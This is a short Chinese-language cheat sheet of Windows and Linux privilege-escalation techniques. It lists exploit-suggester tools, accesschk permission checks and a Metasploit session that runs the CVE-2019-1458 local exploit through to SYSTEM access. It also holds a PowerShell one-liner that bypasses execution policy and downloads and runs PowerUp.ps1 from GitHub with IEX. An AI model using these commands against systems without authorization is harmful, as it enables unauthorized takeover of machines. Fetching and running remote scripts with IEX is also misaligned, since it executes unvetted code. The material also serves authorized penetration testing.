1、使用Windows-Exploit-Suggester解析systeminfo
https://github.com/AonCyberLabs/Windows-Exploit-Suggester
2、使用Linux-Exploit-Suggester.sh寻找linux提权问题 https://github.com/mzet-/linux-exploit-suggester
3、使用Sherlock工具 https://github.com/rasta-mouse/Sherlock
4、使用Windows-Exploit-Suggester解析systeminfo https://github.com/AonCyberLabs/Windows-Exploit-Suggester
5、使用MSF查询补丁和可利用提权漏洞 #查询补丁
meterpreter> run post/windows/gather/enum_patches
[+] KB2999226 installed on 11/25/2020
[+] KB976902 installed on 11/21/2010
#查询Exp
msf> use post/multi/recon/local_exploit_suggester
msf> set LHOST <攻击机IP>
msf> set SESSION
msf> run
# 利用示例
msf> use exploit/windows/local/cve_2019_1458_wizardopium
msf> set SESSION
msf> run
meterpreter> getuid
Server username: NT AUTHORITY\SYSTEM
6、使用powerup检查提权漏洞 powershell.exe -exec bypass -Command "& {Import-Module.\PowerUp.ps1;Invoke-AllChecks}"
powershell.exe -nop -exec bypass -c "IEX (New-object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1');Invoke-AllChecks" 7、使用accesschk.exe对系统扫描发现高权限可执行程序,且能够被低权限用户更改 accesschk "d:\dir"
查看所有用户在d盘dir路径的子路径的权限
accesschk "Administrator "d:\dir" 查看Administrator用户在d盘dir路径的子路径的权限
accesschk Administrators -c * 查看Administrators组对所有服务的权限
accesschk -k Guest hklm\software 查看Guest用户对hklm\software注册表的权限
accesschk -ou User 查看User用户对全局对象的权限 8、查找主机上具有的CVE,查找具有公开EXP的CVE的Python脚本 https://github.com/chroblert/WindowsVulnScan
9、在线提权漏洞检测平台 极光无限出品的安全扫描仪,在提权方面,基于其强大的安全检测能力,能够给出专业的修复建议,有效验证和加固网络资产漏洞。
10、提权辅助网页 在Windows提权的时候,对比补丁找Exp很烦吧?这个网站数据源每周更新一次,值得推荐。
|